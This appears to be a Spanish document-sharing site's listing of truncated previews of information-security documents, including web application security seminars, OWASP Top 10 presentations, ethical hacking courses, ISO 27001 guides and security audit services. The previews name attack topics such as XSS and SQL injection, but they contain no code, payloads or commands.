Vulnerabilidades de los sistemas informáticos

Vulnerabilidades de los sistemas informáticos Vulnerabilidades de los sistemas informáticos formador Ezequiel Llarena Borges http://youtu.be/fdhayogalv4/ 1 Responsables de las vulnerabilidades que afectan a los sistemas informáticos formador Ezequiel

Más detalles

REPOSITORIO DE FRAUDE ELECTRÓNICO DE INTECO

REPOSITORIO DE FRAUDE ELECTRÓNICO DE INTECO REPOSITORIO DE FRAUDE ELECTRÓNICO DE INTECO Presentación a Entidades Financieras Febrero 2010 El presente documento cumple con las condiciones de accesibilidad del formato PDF (Portable Document Format).

Más detalles

Servicios de Seguridad de la Información

Servicios de Seguridad de la Información Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos

Más detalles

Administración de servicios Web (MF0495_3)

Administración de servicios Web (MF0495_3) Ficha de orientación al alumno para su participación en la acción formativa Administración de servicios Web (MF0495_3) A quién está dirigido este Módulo Formativo? Trabajadores ocupados o desempleados

Más detalles

LOGO COLABORADOR 14.11.2007 1

LOGO COLABORADOR 14.11.2007 1 14.11.2007 1 AUDITORÍA WEB D. Ángel Alonso Párrizas CISM, CISSP, GCIH, GCIA, CCNA Ingeniero de Seguridad 14.11.2007 2 1. Clasificación de las auditorias web 2. Auditoría Jurídica/legal 3. Auditoría accesibilidad

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

Curso Online. Desarrollo Seguro en Java

Curso Online. Desarrollo Seguro en Java Curso Online Desarrollo Seguro en Java Índice: >> Plan de estudios >> Introducción >> A quién va dirigido >> Metodología >> Dinámica >> Contenido Cursos Online Plan de estudios: Itinerario Formativo por

Más detalles

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster

Más detalles

Jornadas de concienciación Gestión de la Seguridad de la Información. para la PYME. Sara García Bécares Ana Santos Pintor. Versión 1.

Jornadas de concienciación Gestión de la Seguridad de la Información. para la PYME. Sara García Bécares Ana Santos Pintor. Versión 1. Jornadas de concienciación Gestión de la Seguridad de la Información para la PYME Sara García Bécares Ana Santos Pintor Versión 1.0 Índice de la Jornada Parte 1 1. El Instituto Nacional de las Tecnologías

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

Inseguridad de los sistemas de autenticación en aplicaciones web

Inseguridad de los sistemas de autenticación en aplicaciones web Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz vaguilera@isecauditors.com Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias

Más detalles

FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB.

FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO II - HACKING

Más detalles

Instituto Nacional de Tecnologías de la Comunicación II JORNADA SEGURIDAD, TECNOLOGÍA Y SOCIEDAD SEMANA CIENCIA 06

Instituto Nacional de Tecnologías de la Comunicación II JORNADA SEGURIDAD, TECNOLOGÍA Y SOCIEDAD SEMANA CIENCIA 06 II JORNADA SEGURIDAD, TECNOLOGÍA Y SOCIEDAD SEMANA CIENCIA 06 1. Qué es el Inteco? 2. Amenazas Silenciosas: Rootkits y Botnets 3. Relaciones con el Fraude en Internet 4. Recomendaciones de Inteco 1. Qué

Más detalles

Extensión de módulos de pruebas de seguridad de. la herramienta Webgoat Proyecto OWASP. Daniel Cabezas Molina Daniel Muñiz Marchante 1

Extensión de módulos de pruebas de seguridad de. la herramienta Webgoat Proyecto OWASP. Daniel Cabezas Molina Daniel Muñiz Marchante 1 Extensión de módulos de pruebas de seguridad de la herramienta Webgoat Proyecto OWASP Daniel Cabezas Molina Daniel Muñiz Marchante 1 1. Introducción y objetivos 2. Herramientas utilizadas 3. Prueba de

Más detalles

Implantación de un SGSI

Implantación de un SGSI Implantación de un SGSI con e-pulpo ÍNDICE 1 Introducción... 3 2 SGSI y normativas... 4 2.1 La serie 27000... 4 2.1 ISO/IEC 27001 (SGSI)... 5 2.2 ISO/IEC 27002... 6 2.3 Objetivos de control y controles...

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Antecedentes Nueva Directiva comunitaria sobre Protección

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información"

Tecnologías Aplicadas al Dominio Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información" No nos va a pasar nosotros Riesgo en Aplicaciones y Sistemas de Información Malas prácticas de

Más detalles

Oficina de Seguridad del Internauta (OSI). Ministerio de Industria, Turismo y Comercio DATOS GENERALES. Antecedentes del servicio

Oficina de Seguridad del Internauta (OSI). Ministerio de Industria, Turismo y Comercio DATOS GENERALES. Antecedentes del servicio Oficina de Seguridad del Internauta (OSI). Ministerio de Industria, Turismo y Comercio DATOS GENERALES Antecedentes del servicio Los usuarios frecuentes, es decir, los que se conectan a la red a diario

Más detalles

CATÁLOGO DE SERVICIOS

CATÁLOGO DE SERVICIOS o o (1) 1 r: CATÁLOGO DE SERVICIOS ÍNDICE INTRODUCCIÓN 3 SERVICIOS DE SEGURIDAD 4 AUDITORÍAS TÉCNICAS DE SEGURIDAD 5 BASTIONADO DE SISTEMAS 6 ANÁLISIS FORENSE DE SISTEMAS 6 ANÁLISIS DE RIESGOS 7 SISTEMAS

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

100% Laboratorios en Vivo

100% Laboratorios en Vivo 100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

Tu Educación en Manos de Profesionales

Tu Educación en Manos de Profesionales La Universidad Nacional de Ingeniera (UNI) a través de la Dirección de Posgrado, tiene el agrado de invitarlos a la Segunda Convocatoria de cursos especializados de capacitación y actualización continua

Más detalles

Diagnóstico sobre la seguridad de la información y la privacidad en las redes sociales

Diagnóstico sobre la seguridad de la información y la privacidad en las redes sociales Diagnóstico sobre la seguridad de la información y la privacidad en las redes sociales Jornada: La protección del internauta europeo Centro Europeo del Consumidor en España Madrid, 2 de julio de 2009 Pablo

Más detalles

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster

Más detalles

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas Problemas más comunes y principales contramedidas Seguridad en aplicaciones web Problemas más comunes y principales contramedidas Fernando de la Villa Gerente de Soluciones Area Seguridad Mnemo Evolution

Más detalles

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L.

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L. Auditorías de Seguridad: revisión como método de prevención Vicente Aguilera Díaz Internet Security Auditors, S.L. CONTENIDO 1. Protección de la información 2. Auditorías de seguridad 3. Implantación de

Más detalles

Laboratorio Nacional de Calidad del Software Servicios de apoyo a la empresa

Laboratorio Nacional de Calidad del Software Servicios de apoyo a la empresa Laboratorio Nacional de Calidad del Software Servicios de apoyo a la empresa XI Jornadas de Innovación y Calidad del Software Alcalá de Henares - Septiembre 2009 Diagnóstico Inicial El 86% de los entrevistados

Más detalles

Seguridad de un Portal

Seguridad de un Portal Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2

Más detalles

Guía del empleado seguro

Guía del empleado seguro Guía del empleado seguro INTRODUCCIÓN La seguridad de la información en una empresa es responsabilidad del departamento de IT (tecnologías de la información) o del propio área de Seguridad de la Información

Más detalles

Certified Ethical Hacker Training

Certified Ethical Hacker Training Pág. 1 de 6 CONTENIDO DETALLADO Certified Ethical Hacker Training Descripción del Curso El Hacker Ético es la persona que lleva a cabo intentos de intrusión en redes y/o sistemas utilizando los mismos

Más detalles

In-seguridad y malware en dispositivos móviles

In-seguridad y malware en dispositivos móviles In-seguridad y malware en dispositivos móviles Damián Muraña damian @ murana.uy @damianmurana damianmurana@joindiaspora.com www.murana.uy Para qué usamos los móviles? 03/2013 Com. por internet E-Mail Noticias

Más detalles

Normativa de seguridad y uso de los recursos informáticos en la UPCT

Normativa de seguridad y uso de los recursos informáticos en la UPCT Normativa de seguridad y uso de los recursos informáticos en la UPCT Aprobada por: Consejo de Gobierno de la UPCT. Fecha: 7 de Noviembre de 2011. Resumen: La Política de Seguridad de la UPCT se aprobó

Más detalles

Auditoría de Seguridad

Auditoría de Seguridad Auditoría de Seguridad Introducción Tipos auditoría Externa Caja Negra Interna Caja Blanca Informes Valoración sistema Oferta y Tarificación Recursos Formación - certificaciones Auditoría de Seguridad

Más detalles

Administración de Servicios Web (Online)

Administración de Servicios Web (Online) TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Administración de Servicios Web (Online) Duración: 180 horas Precio: 0 * Modalidad: Online * hasta

Más detalles

LEY 28612 LEY QUE NORMA EL USO, ADQUISICIÓN Y ADECUACIÓN DEL SOFTWARE EN LA ADMINISTRACIÓN PÚBLICA

LEY 28612 LEY QUE NORMA EL USO, ADQUISICIÓN Y ADECUACIÓN DEL SOFTWARE EN LA ADMINISTRACIÓN PÚBLICA Página: 1 de 12 INFORME TÉCNICO ADQUISICION DE SOFTWARE DE SOLUCIÓN ANTIVIRUS Página: 2 de 12 CONTENIDO I. NOMBRE DEL ÁREA 3 II. RESPONSABLE DE LA EVALUACIÓN 3 III. CARGO 3 IV. FECHA 3 V. JUSTIFICACIÓN

Más detalles

Ataques Web Automáticos: Identificación, Engaño y Contraataque

Ataques Web Automáticos: Identificación, Engaño y Contraataque Ataques Web Automáticos: Identificación, Engaño y Contraataque Mariano Nuñez Di Croce mnunez@cybsec cybsec.comcom Noviembre 2005 CIBSI 05 Valparaíso, Chile Agenda - Introducción a las Herramientas Automáticas.

Más detalles

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Norma: Normas de Seguridad de Datos (DSS) Requisito: 6.6 Fecha: febrero de 2008 Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Fecha de publicación:

Más detalles

Técnico Profesional en Sistema de Gestión de Seguridad de la Información UNE-ISO/IEC 27001:2014

Técnico Profesional en Sistema de Gestión de Seguridad de la Información UNE-ISO/IEC 27001:2014 Técnico Profesional en Sistema de Gestión de Seguridad de la Información UNE-ISO/IEC Titulación certificada por EUROINNOVA BUSINESS SCHOOL Técnico Profesional en Sistema de Gestión de Seguridad de la Información

Más detalles

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos? Venezuela The Foundation http://www.owasp.org Chapter Pruebas de Seguridad en aplicaciones web segun Donde estamos... Hacia donde vamos? Edgar D. Salazar T Venezuela Chapter Leader edgar.salazar@owasp.org

Más detalles

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas

Más detalles

Máster en Instalación, Gestión y Mantenimiento de CRM: Gestión de Relaciones con Clientes

Máster en Instalación, Gestión y Mantenimiento de CRM: Gestión de Relaciones con Clientes Máster en Instalación, Gestión y Mantenimiento de CRM: Gestión de Relaciones con Clientes Titulación certificada por EUROINNOVA BUSINESS SCHOOL Máster en Instalación, Gestión y Mantenimiento de CRM: Gestión

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

SEGURIDAD ataques riesgos tipos de amenazas

SEGURIDAD ataques riesgos tipos de amenazas SEGURIDAD La seguridad en sistemas es un área de las Ciencias de la Computación que se ocupa de diseñar las normas, procedimientos, métodos y técnicas destinados a conseguir un sistema de información seguro

Más detalles

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB OCTUBRE DE 2011 Edita: Editor y Centro Criptológico Nacional, 2011 NIPO: 076-11-053-3 Tirada: 1000 ejemplares Fecha

Más detalles

Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top 10

Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top 10 Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top Mauro Flores mauflores@deloitte.com mauro_fcib UySeg Modelo de Amenazas (Threat Model) Mobile Top La Lista 1 Almacenamiento Inseguro

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

INFORME DE ACCESO REMOTO SEGURO CON PROTECCIÓN WAF WEB APPLICATION FIREWALL. Universidad de Alcalá Departamento de Ciencias de la Computación

INFORME DE ACCESO REMOTO SEGURO CON PROTECCIÓN WAF WEB APPLICATION FIREWALL. Universidad de Alcalá Departamento de Ciencias de la Computación LABORATORIO INFORME DE ACCESO REMOTO SEGURO CON PROTECCIÓN WAF WEB APPLICATION FIREWALL SonicWALL SRA 4200 Universidad de Alcalá Departamento de Ciencias de la Computación SonicWALL SRA 4200 SonicWALL

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

Capítulo V. Seguridad de un portal

Capítulo V. Seguridad de un portal Capítulo V Seguridad de un portal Capítulo V Seguridad del portal 261 Seguridad del Portal Los portales WEB se ven expuestos a un creciente número de amenazas y vulnerabilidades que pueden afectar la

Más detalles

IFCT0509 Administración de Servicios de Internet (Online)

IFCT0509 Administración de Servicios de Internet (Online) IFCT0509 Administración de Servicios de Internet (Online) TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES IFCT0509 Administración de Servicios de

Más detalles

Administración de Servicios de Internet (Online) (Dirigida a la Acreditación de las Competencias Profesionales R.D. 1224/2009)

Administración de Servicios de Internet (Online) (Dirigida a la Acreditación de las Competencias Profesionales R.D. 1224/2009) Administración de Servicios de Internet (Online) (Dirigida a la Acreditación de las Competencias Titulación certificada por EUROINNOVA BUSINESS SCHOOL Administración de Servicios de Internet (Online) (Dirigida

Más detalles

Especificaciones Técnicas para Ethical Hacking

Especificaciones Técnicas para Ethical Hacking Especificaciones Técnicas para Ethical Hacking OBJETIVO PRINCIPAL El BANCO DEL ESTADO, requiere efectuar un estudio de Ethical Hacking sobre su infraestructura, que permita identificar y corregir las vulnerabilidades

Más detalles

Gestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP

Gestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP Gestión de Seguridad en canales electrónicos Ing. Jorge O Higgins, CISSP Contenido 1. Objetivos de seguridad en el ambiente financiero 2. Definición de requerimientos de seguridad 3. Seguridad como proceso

Más detalles

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Julio 2005 Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Penetration Test Metodologías & Usos

Penetration Test Metodologías & Usos Penetration Test Metodologías & Usos Lic. Luis Ramírez lramirez@cybsec.com 18 de Noviembre de 2009 Asunción, n, Paraguay Agenda Introducción Seguridad Informática en los Sistemas Objetivos, Tipos y Alcances

Más detalles

un enfoque práctico en el entorno universitario

un enfoque práctico en el entorno universitario Seguridad en aplicaciones Web: un enfoque práctico en el entorno universitario Evangelino Valverde Álvarez Área de Tecnología y Comunicaciones UCLM Contexto 4 campus Ciudad Real, Albacete, Cuenca, Toledo

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

Técnico Especialista TIC en Administración de CRM: Recursos Empresariales y de Gestión de Relaciones con Clientes

Técnico Especialista TIC en Administración de CRM: Recursos Empresariales y de Gestión de Relaciones con Clientes Técnico Especialista TIC en Administración de CRM: Recursos Empresariales y de Gestión de TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Técnico

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS

WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS Índice Overview 4 Introducción 5 Qué es un CMS? Quién usa WordPress? Vulnerabilidades en WordPress Medidas de seguridad básicas 6-7 Mantener WordPress y

Más detalles

Requisitos de control de proveedores externos

Requisitos de control de proveedores externos Requisitos de control de proveedores externos Ciberseguridad Para proveedores clasificados como de bajo riesgo de ciberdelito 1. Protección de activos y configuración de sistemas Los Datos de Barclays,

Más detalles

iso27002.es - El Anexo de ISO 27001 en español

iso27002.es - El Anexo de ISO 27001 en español ISO 27002 Site Home» ISO 27002 ISO 27002 Powered by: ISO 27002 05. Política de Seguridad 06. Organización de la Seguridad de Información 07. Gestión de Activos 08. Seguridad ligada a los Recursos Humanos

Más detalles

Implantación de Aplicaciones Web Fecha: 20-09-13

Implantación de Aplicaciones Web Fecha: 20-09-13 Página 1 de 24 RESUMEN DE LA PROGRAMACIÓN ADMINISTRACIÓN DE SISTEMAS INFORMÁTICOS EN RED CURSO AC. 2012 / 2013 ÁREA / MATERIA / MÓDULO PROFESIONAL Implantación de Aplicaciones Web (84 horas 4 horas semanales)

Más detalles

Contrato de Consultoría y Asistencia para el diseño del Servicio de Atención Ciudadana (SAC) del Ayuntamiento

Contrato de Consultoría y Asistencia para el diseño del Servicio de Atención Ciudadana (SAC) del Ayuntamiento Concurso abierto Marzo 2005 Contrato de Consultoría y Asistencia para el diseño del Servicio de Atención Ciudadana (SAC) del Ayuntamiento PROYECTO CONSULTORÍA Y ASISTENCIA TÉCNICA PARA LA CONEXIÓN DE LA

Más detalles

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Denise Betancourt Sandoval Omar Alí Domínguez Cabañas Rodrigo Augusto Ortiz Ramón Problemática Pruebas de penetración como una

Más detalles

Administración de Servicios de Internet

Administración de Servicios de Internet TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Administración de Servicios de Internet Duración: 590 horas Precio: 0 * Modalidad: A distancia *

Más detalles

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org Introducción a Ing. Camilo Fernandez Consultor en Seguridad Informática Octubre, 2010 cfernandez@develsecurity.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or modify

Más detalles

mope SEGURIDAD INFORMÁTICA

mope SEGURIDAD INFORMÁTICA DENOMINACIÓN: Código: IFCT0109 Familia Profesional: Informática y Comunicaciones Área profesional: Sistemas y telemática Nivel de cualificación profesional: 3 Cualificación profesional de referencia: IFC153_3

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

Agenda. I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar

Agenda. I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar Agenda I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar Juan Antonio Calles (@jantoniocalles) Quiénes somos? Jefe de Proyectos de Seguridad en everis www.flu-project.com elblogdecalles.blogspot.com

Más detalles

Universidad Nacional de La Matanza Escuela Internacional de Informática

Universidad Nacional de La Matanza Escuela Internacional de Informática Universidad Nacional de La Matanza Escuela Internacional de Informática Curso 02 Días: de lunes 20 a viernes 24 de Octubre Horario: de 8:30 a 12:30 hs. Horas totales del curso: 20 con evaluación Cantidad

Más detalles

DIA 21 Taller: Implantación ISO 27000 en el entorno empresarial PYME

DIA 21 Taller: Implantación ISO 27000 en el entorno empresarial PYME DIA 21 Taller: Implantación ISO 27000 en el entorno empresarial PYME Ponencia: Gestión de incidentes de seguridad y planes de continuidad de negocio. Metodología y aspectos prácticos para implantación

Más detalles